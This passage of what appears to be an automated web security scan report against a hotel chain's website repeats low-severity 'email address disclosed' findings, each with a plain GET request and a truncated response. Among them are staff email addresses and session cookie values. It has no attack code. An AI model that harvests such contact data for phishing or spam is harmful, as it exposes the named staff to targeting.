<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Search - Red Carnation Hotels</
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.81. http://www.redcarnationhotels.com/side-images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /side-images

Issue detail

The following email address was disclosed in the response:

Request

GET /side-images HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Side Images</title>
<meta http-
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.82. http://www.redcarnationhotels.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /site-map

Issue detail

The following email address was disclosed in the response:

Request

GET /site-map HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:31 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bc0e91c340b0c8c5f0de0f9133eec66b; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Site Map</title>
<meta http-equ
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.83. http://www.redcarnationhotels.com/special-occasions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions

Issue detail

The following email address was disclosed in the response:

Request

GET /special-occasions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=064d44ec42ae0320af68f09cef0becea; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.84. http://www.redcarnationhotels.com/special-occasions/celebrations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/celebrations

Issue detail

The following email address was disclosed in the response:

Request

GET /special-occasions/celebrations HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:40 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Private parties and celebration
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.85. http://www.redcarnationhotels.com/special-occasions/escapes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/escapes

Issue detail

The following email address was disclosed in the response:

Request

GET /special-occasions/escapes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Escapes - Red Carnation Hotels<
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.86. http://www.redcarnationhotels.com/special-occasions/tell-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/tell-us

Issue detail

The following email address was disclosed in the response:

Request

GET /special-occasions/tell-us HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:55:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:55:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Tell Us - Special Occasions - R
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.87. http://www.redcarnationhotels.com/special-occasions/weddings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/weddings

Issue detail

The following email address was disclosed in the response:

Request

GET /special-occasions/weddings HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:53 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Wedding Venues, Honeymoo
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.88. http://www.redcarnationhotels.com/test_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /test_1

Issue detail

The following email address was disclosed in the response:

Request

GET /test_1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:36 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>test</title>
<meta http-equiv="
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.89. http://www.redcarnationhotels.com/travel-agents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents

Issue detail

The following email address was disclosed in the response:

Request

GET /travel-agents HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:25:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:25:05 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8ed7ac330ba840ea6828a58e485783b4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.90. http://www.redcarnationhotels.com/travel-agents/agents-commissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/agents-commissions

Issue detail

The following email address was disclosed in the response:

Request

GET /travel-agents/agents-commissions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:58 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, Agents Co
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.91. http://www.redcarnationhotels.com/travel-agents/sales-representatives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/sales-representatives

Issue detail

The following email addresses were disclosed in the response:

Request

GET /travel-agents/sales-representatives HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:35 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Sales Representatives, Red Carn
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<a href="mailto:tholmes@rchmail.com"><u><font color="#990000">tholmes@rchmail.com </font>
...[SNIP]...
<a href="mailto:kfleet@rchmail.com">kfleet@rchmail.com</a>
...[SNIP]...
<a href="mailto:phemmings@rchmail.com">
...[SNIP]...
<u>phemmings@rchmail.com</u>
...[SNIP]...
<a href="mailto:lhitchins@rchmail.com">lday@rchmail.com</a>
...[SNIP]...
<a href="mailto:ltwitchin@rchmail.com"> lcorr@rchmail.com</a>
...[SNIP]...
<a href="mailto:smcgovern@rchmail.com">smcgovern@rchmail.com</a>
...[SNIP]...
<a href="mailto:Petra@luxuryrepcollection.comT">Petra@luxuryrepcollection.com<br />
...[SNIP]...
<a href="mailto:Marina@apriorigroup.ru">
...[SNIP]...
<u>Marina@apriorigroup.ru</u>
...[SNIP]...
<a href="mailto:knouauilles@rchmail.com">knouauilles@rchmail.com</a>
...[SNIP]...
<a href="mailto:fbroussard@rchmail.com">
...[SNIP]...
<u>fbroussard@rchmail.com</u>
...[SNIP]...
6.92. http://www.redcarnationhotels.com/travel-agents/trade-shows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/trade-shows

Issue detail

The following email address was disclosed in the response:

Request

GET /travel-agents/trade-shows HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:58 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents, Trade Shows, Red
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.93. http://www.redcarnationhotels.com/useful-links  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /useful-links

Issue detail

The following email address was disclosed in the response:

Request

GET /useful-links HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=fa8e88b1ec9853100dafa585ebdfc757; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Links - Red Carnation Ho
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.94. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /useful-links/useful-travel-links_1

Issue detail

The following email address was disclosed in the response:

Request

GET /useful-links/useful-travel-links_1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Travel Links - Red Carna
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.95. http://www.redcarnationhotels.com/usvirginatlantic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /usvirginatlantic

Issue detail

The following email address was disclosed in the response:

Request

GET /usvirginatlantic HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:12 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Virgin Atlantic USA</title>
<me
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.96. http://www.redcarnationhotels.com/wellness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /wellness

Issue detail

The following email address was disclosed in the response:

Request

GET /wellness HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8103ef1c266dc5bf10402082bca4acc4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Spa Hotels, UK, London,
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.97. http://www.redcarnationhotels.com/what-is-rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /what-is-rss

Issue detail

The following email address was disclosed in the response:

Request

GET /what-is-rss HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:57:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:57:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, RSS</titl
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.98. http://www.redcarnationhotels.com/your-stay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:02 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a046d59539af2a88b9e0057f3dbee706; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.99. http://www.redcarnationhotels.com/your-stay/business-pleasure  previous  next

Summary

Severity:   Information
